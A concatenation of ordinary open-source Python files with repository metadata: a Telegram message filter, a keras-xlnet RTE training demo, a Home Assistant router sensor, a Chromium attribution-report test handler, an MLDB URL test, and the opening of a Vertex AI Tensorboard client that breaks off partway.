mime_type = event.media.document.mime_type
if 'audio' in mime_type:
return 'audio'
if 'video' in mime_type:
return 'video'
if 'image/webp' in mime_type:
return 'sticker'
# Anything else is a file
return 'document'
@staticmethod
def filter_msg(filter_id, message_event):
"""
Function that decides if a message should be forwarded or not
Returns Boolean
"""
# Get Filter dictionary from database
filter_dict = MessageFilter.get_filter(filter_id)
if filter_dict == False:
logger.info('No filters for id : {}'.format(filter_id))
return False
# Get Active Filter list
filter_list = MessageFilter.get_active_filters(filter_dict)
# Get Message Types
msg_type = MessageFilter.get_message_type(message_event)
msg_text = message_event.message.text.lower()
if msg_type in filter_list:
logger.info(f'Filter caught :: {msg_type}')
return True
if 'contain' not in filter_list and 'notcontain' not in filter_list:
logger.info('All filters passed.')
return False
# Assume message does not contain the required word
contains_required_word = False
if 'contain' in filter_list:
# Look for text messages only
if message_event.media is not None:
return False
keywords = filter_dict['contain'].split('<stop_word>')
for keyword in keywords:
if keyword in msg_text:
contains_required_word = True
break
# Assume message does contain the blacklist word
contains_blacklist_word = False
if 'notcontain' in filter_list:
# Look for text messages only
if message_event.media is not None:
return False
keywords = filter_dict['notcontain'].split('<stop_word>')
for keyword in keywords:
if keyword in msg_text:
contains_blacklist_word = True
break
logger.info('Contains word :: {} && Contains Blacklist :: {}'.format(
contains_required_word, contains_blacklist_word))
return (not contains_required_word) or contains_blacklist_word
|
8d6d3bc3651f695962398b6595481de43607d91c
|
b60a81fd1ecaf62eb7e367f739e77049895352e2
|
/demo/GLUE/RTE/rte.py
|
b01b2af2ff2aede68c94fd01747fbfb7acdea499
|
[
"MIT"
] |
permissive
|
CyberZHG/keras-xlnet
|
3453e61bae702611e3f30e86a73f80a41f32f7de
|
d9dbd2c00d9ffbf1d12a8bf3ef75ece4b25b06de
|
refs/heads/master
| 2022-02-04T20:35:32.928627
| 2022-01-01T02:00:00
| 2022-01-01T02:00:00
| 192,900,188
| 190
| 34
|
MIT
| 2019-07-15T16:52:14
| 2019-06-20T10:30:13
|
Python
|
UTF-8
|
Python
| false
| false
| 3,728
|
py
|
rte.py
|
import os
import numpy as np
import pandas as pd
from keras_xlnet.backend import keras
from keras_bert.layers import Extract
from keras_xlnet import PretrainedList, get_pretrained_paths
from keras_xlnet import Tokenizer, load_trained_model_from_checkpoint, ATTENTION_TYPE_BI
EPOCH = 10
BATCH_SIZE = 16
SEQ_LEN = 100
MODEL_NAME = 'RTE.h5'
CLASSES = {
'not_entailment': 0,
'entailment': 1,
}
current_path = os.path.dirname(os.path.abspath(__file__))
train_path = os.path.join(current_path, 'train.tsv')
dev_path = os.path.join(current_path, 'dev.tsv')
paths = get_pretrained_paths(PretrainedList.en_cased_base)
tokenizer = Tokenizer(paths.vocab)
# Read data
class DataSequence(keras.utils.Sequence):
def __init__(self, x, y):
self.x = x
self.y = y
def __len__(self):
return (len(self.y) + BATCH_SIZE - 1) // BATCH_SIZE
def __getitem__(self, index):
s = slice(index * BATCH_SIZE, (index + 1) * BATCH_SIZE)
return [item[s] for item in self.x], self.y[s]
def generate_sequence(path):
tokens, classes = [], []
df = pd.read_csv(path, sep='\t', error_bad_lines=False)
for _, row in df.iterrows():
text_a, text_b, cls = row['sentence1'], row['sentence2'], row['label']
if not isinstance(text_a, str) or not isinstance(text_b, str) or cls not in CLASSES:
continue
encoded_a, encoded_b = tokenizer.encode(text_a)[:48], tokenizer.encode(text_b)[:49]
encoded = encoded_a + [tokenizer.SYM_SEP] + encoded_b + [tokenizer.SYM_SEP]
encoded = [tokenizer.SYM_PAD] * (SEQ_LEN - 1 - len(encoded)) + encoded + [tokenizer.SYM_CLS]
tokens.append(encoded)
classes.append(CLASSES[cls])
tokens, classes = np.array(tokens), np.array(classes)
segments = np.zeros_like(tokens)
segments[:, -1] = 1
lengths = np.zeros_like(tokens[:, :1])
return DataSequence([tokens, segments, lengths], classes)
current_path = os.path.dirname(os.path.abspath(__file__))
train_seq = generate_sequence(train_path)
dev_seq = generate_sequence(dev_path)
# Load pretrained model
model = load_trained_model_from_checkpoint(
config_path=paths.config,
checkpoint_path=paths.model,
batch_size=BATCH_SIZE,
memory_len=0,
target_len=SEQ_LEN,
in_train_phase=False,
attention_type=ATTENTION_TYPE_BI,
)
# Build classification model
last = Extract(index=-1, name='Extract')(model.output)
dense = keras.layers.Dense(units=768, activation='tanh', name='Dense')(last)
dropout = keras.layers.Dropout(rate=0.1, name='Dropout')(dense)
output = keras.layers.Dense(units=2, activation='softmax', name='Softmax')(dropout)
model = keras.models.Model(inputs=model.inputs, outputs=output)
model.summary()
# Fit model
if os.path.exists(MODEL_NAME):
model.load_weights(MODEL_NAME)
model.compile(
optimizer=keras.optimizers.Adam(lr=3e-5),
loss='sparse_categorical_crossentropy',
metrics=['sparse_categorical_accuracy'],
)
model.fit_generator(
generator=train_seq,
validation_data=dev_seq,
epochs=EPOCH,
callbacks=[keras.callbacks.EarlyStopping(monitor='val_loss', patience=2)],
)
model.save_weights(MODEL_NAME)
# Evaluation
# Use dev set because the results of test set is unknown
results = model.predict_generator(dev_seq, verbose=True).argmax(axis=-1)
tp, fp, fn, tn = 0, 0, 0, 0
for i in range(len(results)):
if results[i] == 1:
if dev_seq.y[i] == 1:
tp += 1
else:
fp += 1
else:
if dev_seq.y[i] == 1:
fn += 1
else:
tn += 1
print('Confusion:')
print('[{}, {}]'.format(tp, fp))
print('[{}, {}]'.format(fn, tn))
print('Accuracy: %.2f' % (100.0 * (tp + tn) / len(results)))
|
b495a2d500f1e59c0a15fff0eb7863daeaa9e308
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/vilfo/sensor.py
|
511e25bbfbaa8bf10fd231447855a48a95f50829
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
sensor.py
|
"""Support for Vilfo Router sensors."""
from dataclasses import dataclass
from homeassistant.components.sensor import (
SensorDeviceClass,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE
from homeassistant.core import HomeAssistant
from homeassistant.helpers.device_registry import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import (
ATTR_API_DATA_FIELD_BOOT_TIME,
ATTR_API_DATA_FIELD_LOAD,
ATTR_BOOT_TIME,
ATTR_LOAD,
DOMAIN,
ROUTER_DEFAULT_MODEL,
ROUTER_DEFAULT_NAME,
ROUTER_MANUFACTURER,
)
@dataclass
class VilfoRequiredKeysMixin:
"""Mixin for required keys."""
api_key: str
@dataclass
class VilfoSensorEntityDescription(SensorEntityDescription, VilfoRequiredKeysMixin):
"""Describes Vilfo sensor entity."""
SENSOR_TYPES: tuple[VilfoSensorEntityDescription, ...] = (
VilfoSensorEntityDescription(
key=ATTR_LOAD,
translation_key=ATTR_LOAD,
native_unit_of_measurement=PERCENTAGE,
icon="mdi:memory",
api_key=ATTR_API_DATA_FIELD_LOAD,
),
VilfoSensorEntityDescription(
key=ATTR_BOOT_TIME,
translation_key=ATTR_BOOT_TIME,
icon="mdi:timer-outline",
api_key=ATTR_API_DATA_FIELD_BOOT_TIME,
device_class=SensorDeviceClass.TIMESTAMP,
),
)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Add Vilfo Router entities from a config_entry."""
vilfo = hass.data[DOMAIN][config_entry.entry_id]
entities = [VilfoRouterSensor(vilfo, description) for description in SENSOR_TYPES]
async_add_entities(entities, True)
class VilfoRouterSensor(SensorEntity):
"""Define a Vilfo Router Sensor."""
entity_description: VilfoSensorEntityDescription
_attr_has_entity_name = True
def __init__(self, api, description: VilfoSensorEntityDescription) -> None:
"""Initialize."""
self.entity_description = description
self.api = api
self._attr_device_info = DeviceInfo(
identifiers={(DOMAIN, api.host, api.mac_address)}, # type: ignore[arg-type]
name=ROUTER_DEFAULT_NAME,
manufacturer=ROUTER_MANUFACTURER,
model=ROUTER_DEFAULT_MODEL,
sw_version=api.firmware_version,
)
self._attr_unique_id = f"{api.unique_id}_{description.key}"
@property
def available(self) -> bool:
"""Return whether the sensor is available or not."""
return self.api.available
async def async_update(self) -> None:
"""Update the router data."""
await self.api.async_update()
self._attr_native_value = self.api.data.get(self.entity_description.api_key)
|
f0b078fa1be3036d20bc07f275ac126b1303ac08
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/attribution-reporting/resources/reports.py
|
b71743b0fc04db7afd38e619377b032b34a86348
|
[
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 4,672
|
py
|
reports.py
|
"""Methods for the report-event-attribution and report-aggregate-attribution endpoints"""
import json
from typing import List, Optional, Tuple
import urllib.parse
from wptserve.request import Request
from wptserve.stash import Stash
from wptserve.utils import isomorphic_decode, isomorphic_encode
# Key used to access the reports in the stash.
REPORTS = "4691a2d7fca5430fb0f33b1bd8a9d388"
REDIRECT = "9250f93f-2c05-4aae-83b9-2817b0e18b4e"
CLEAR_STASH = isomorphic_encode("clear_stash")
CONFIG_REDIRECT = isomorphic_encode("redirect_to")
Header = Tuple[str, str]
Status = Tuple[int, str]
Response = Tuple[Status, List[Header], str]
def decode_headers(headers: dict) -> dict:
"""Decodes the headers from wptserve.
wptserve headers are encoded like
{
encoded(key): [encoded(value1), encoded(value2),...]
}
This method decodes the above using the wptserve.utils.isomorphic_decode
method
"""
return {
isomorphic_decode(key): [isomorphic_decode(el) for el in value
] for key, value in headers.items()
}
def get_request_origin(request: Request) -> str:
return "%s://%s" % (request.url_parts.scheme,
request.url_parts.netloc)
def configure_redirect(request, origin) -> None:
with request.server.stash.lock:
request.server.stash.put(REDIRECT, origin)
return None
def get_report_redirect_url(request):
with request.server.stash.lock:
origin = request.server.stash.take(REDIRECT)
if origin is None:
return None
origin_parts = urllib.parse.urlsplit(origin)
parts = request.url_parts
new_parts = origin_parts._replace(path=bytes(parts.path, 'utf-8'))
return urllib.parse.urlunsplit(new_parts)
def handle_post_report(request: Request, headers: List[Header]) -> Response:
"""Handles POST request for reports.
Retrieves the report from the request body and stores the report in the
stash. If clear_stash is specified in the query params, clears the stash.
"""
if request.GET.get(CLEAR_STASH):
clear_stash(request.server.stash)
return (200, "OK"), headers, json.dumps({
"code": 200,
"message": "Stash successfully cleared.",
})
redirect_origin = request.GET.get(CONFIG_REDIRECT)
if redirect_origin:
configure_redirect(request, redirect_origin)
return (200, "OK"), headers, json.dumps({
"code": 200,
"message": "Redirect successfully configured.",
})
redirect_url = get_report_redirect_url(request)
if redirect_url is not None:
headers.append(("Location", redirect_url))
return (308, "Permanent Redirect"), headers, json.dumps({
"code": 308
})
store_report(
request.server.stash, get_request_origin(request), {
"body": request.body.decode("utf-8"),
"headers": decode_headers(request.headers)
})
return (201, "OK"), headers, json.dumps({
"code": 201,
"message": "Report successfully stored."
})
def handle_get_reports(request: Request, headers: List[Header]) -> Response:
"""Handles GET request for reports.
Retrieves and returns all reports from the stash.
"""
reports = take_reports(request.server.stash, get_request_origin(request))
headers.append(("Access-Control-Allow-Origin", "*"))
return (200, "OK"), headers, json.dumps({
"code": 200,
"reports": reports,
})
def store_report(stash: Stash, origin: str, report: str) -> None:
"""Stores the report in the stash. Report here is a JSON."""
with stash.lock:
reports_dict = stash.take(REPORTS)
if not reports_dict:
reports_dict = {}
reports = reports_dict.get(origin, [])
reports.append(report)
reports_dict[origin] = reports
stash.put(REPORTS, reports_dict)
return None
def clear_stash(stash: Stash) -> None:
"Clears the stash."
stash.take(REPORTS)
stash.take(REDIRECT)
return None
def take_reports(stash: Stash, origin: str) -> List[str]:
"""Takes all the reports from the stash and returns them."""
with stash.lock:
reports_dict = stash.take(REPORTS)
if not reports_dict:
reports_dict = {}
reports = reports_dict.pop(origin, [])
stash.put(REPORTS, reports_dict)
return reports
def handle_reports(request: Request) -> Response:
"""Handles request to get or store reports."""
headers = [("Content-Type", "application/json")]
if request.method == "POST":
return handle_post_report(request, headers)
if request.method == "GET":
return handle_get_reports(request, headers)
return (405, "Method Not Allowed"), headers, json.dumps({
"code": 405,
"message": "Only GET or POST methods are supported."
})
|
894e9b42c7f418b7e19a5fe4cf60eca3033ed0ea
|
479a9c76b19b84d6cde69305828031cd2531aa56
|
/testing/MLDB-696_uri_causes_crash.py
|
6a3507a5c4adda750d3ca2a1fb059eca0754e204
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mldbai/mldb
|
d36801bd99dd3f82d7557cd0f438b0121f63f22c
|
19bc4bc92a41ee8ad4eab0979dffd9c985d95758
|
refs/heads/master
| 2023-09-03T22:59:11.621839
| 2022-12-30T18:42:24
| 2022-12-30T18:42:24
| 47,634,692
| 701
| 107
|
Apache-2.0
| 2023-02-10T23:08:05
| 2015-12-08T16:34:16
|
C++
|
UTF-8
|
Python
| false
| false
| 716
|
py
|
MLDB-696_uri_causes_crash.py
|
# This file is part of MLDB. Copyright 2015 mldb.ai inc. All rights reserved.
try:
mldb.create_dataset({
"type": "beh.mutable", "id": "x",
"params":{
"dataFileUrl": "relative/path/without/protocol.beh"
}}).commit() #should complain about missing protocol!
request.set_return("failure")
exit()
except:
pass
try:
mldb.create_dataset({
"type": "beh.mutable", "id": "y",
"params":{
"dataFileUrl": "/asbolute/path/without/protocol.beh"
}}).commit() #should complain about missing protocol!
request.set_return("failure")
exit()
except:
pass
request.set_return("success")
|
8c66a1665ff3bd28663c4c82e3aaa8412f787f53
|
99dcb18a9e3ea367272f740b8cbf3c34285a0c08
|
/google/cloud/aiplatform_v1/services/tensorboard_service/client.py
|
34f95b1bac48946a07f47479058113b7261651a6
|
[
"Apache-2.0"
] |
permissive
|
googleapis/python-aiplatform
|
926a4873f35dbea15b2fd86c0e16b5e6556d803e
|
76b95b92c1d3b87c72d754d8c02b1bca652b9a27
|
refs/heads/main
| 2023-08-19T23:49:02.180075
| 2023-08-19T13:25:59
| 2023-08-19T13:27:27
| 298,017,988
| 418
| 240
|
Apache-2.0
| 2023-09-14T21:08:33
| 2020-09-23T15:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 213,036
|
py
|
client.py
|
# -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import os
import re
from typing import (
Dict,
Mapping,
MutableMapping,
MutableSequence,
Optional,
Iterable,
Sequence,
Tuple,
Type,
Union,
cast,
)
from google.cloud.aiplatform_v1 import gapic_version as package_version
from google.api_core import client_options as client_options_lib
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation as gac_operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.aiplatform_v1.services.tensorboard_service import pagers
from google.cloud.aiplatform_v1.types import encryption_spec
from google.cloud.aiplatform_v1.types import operation as gca_operation
from google.cloud.aiplatform_v1.types import tensorboard
from google.cloud.aiplatform_v1.types import tensorboard as gca_tensorboard
from google.cloud.aiplatform_v1.types import tensorboard_data
from google.cloud.aiplatform_v1.types import tensorboard_experiment
from google.cloud.aiplatform_v1.types import (
tensorboard_experiment as gca_tensorboard_experiment,
)
from google.cloud.aiplatform_v1.types import tensorboard_run
from google.cloud.aiplatform_v1.types import tensorboard_run as gca_tensorboard_run
from google.cloud.aiplatform_v1.types import tensorboard_service
from google.cloud.aiplatform_v1.types import tensorboard_time_series
from google.cloud.aiplatform_v1.types import (
tensorboard_time_series as gca_tensorboard_time_series,
)
from google.cloud.location import locations_pb2 # type: ignore
from google.iam.v1 import iam_policy_pb2 # type: ignore
from google.iam.v1 import policy_pb2 # type: ignore
from google.longrunning import operations_pb2
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import TensorboardServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import TensorboardServiceGrpcTransport
from .transports.grpc_asyncio import TensorboardServiceGrpcAsyncIOTransport
class TensorboardServiceClientMeta(type):
"""Metaclass for the TensorboardService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TensorboardServiceTransport]]
_transport_registry["grpc"] = TensorboardServiceGrpcTransport
_transport_registry["grpc_asyncio"] = TensorboardServiceGrpcAsyncIOTransport
def get_transport_class(
cls,
label: Optional[str] = None,
) -> Type[TensorboardServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TensorboardServiceClient(metaclass=TensorboardServiceClientMeta):
"""TensorboardService"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "aiplatform.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TensorboardServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TensorboardServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TensorboardServiceTransport:
"""Returns the transport used by the client instance.
Returns:
TensorboardServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def tensorboard_path(
project: str,
location: str,
tensorboard: str,
) -> str:
"""Returns a fully-qualified tensorboard string."""
return (
"projects/{project}/locations/{location}/tensorboards/{tensorboard}".format(
project=project,
location=location,
tensorboard=tensorboard,
)
)
@staticmethod
def parse_tensorboard_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_experiment_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
) -> str:
"""Returns a fully-qualified tensorboard_experiment string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
)
@staticmethod
def parse_tensorboard_experiment_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_experiment path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_run_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
run: str,
) -> str:
"""Returns a fully-qualified tensorboard_run string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
run=run,
)
@staticmethod
def parse_tensorboard_run_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_run path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)/runs/(?P<run>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_time_series_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
run: str,
time_series: str,
) -> str:
"""Returns a fully-qualified tensorboard_time_series string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
run=run,
time_series=time_series,
)
@staticmethod
def parse_tensorboard_time_series_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_time_series path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)/runs/(?P<run>.+?)/timeSeries/(?P<time_series>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(
billing_account: str,
) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(
folder: str,
) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(
folder=folder,
)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(
organization: str,
) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(
organization=organization,
)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(
project: str,
) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(
project=project,
)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(
project: str,
location: str,
) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Optional[Union[str, TensorboardServiceTransport]] = None,
client_options: Optional[Union[client_options_lib.ClientOptions, dict]] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the tensorboard service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, TensorboardServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (Optional[Union[google.api_core.client_options.ClientOptions, dict]]): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
client_options = cast(client_options_lib.ClientOptions, client_options)
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, TensorboardServiceTransport):
# transport is a TensorboardServiceTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
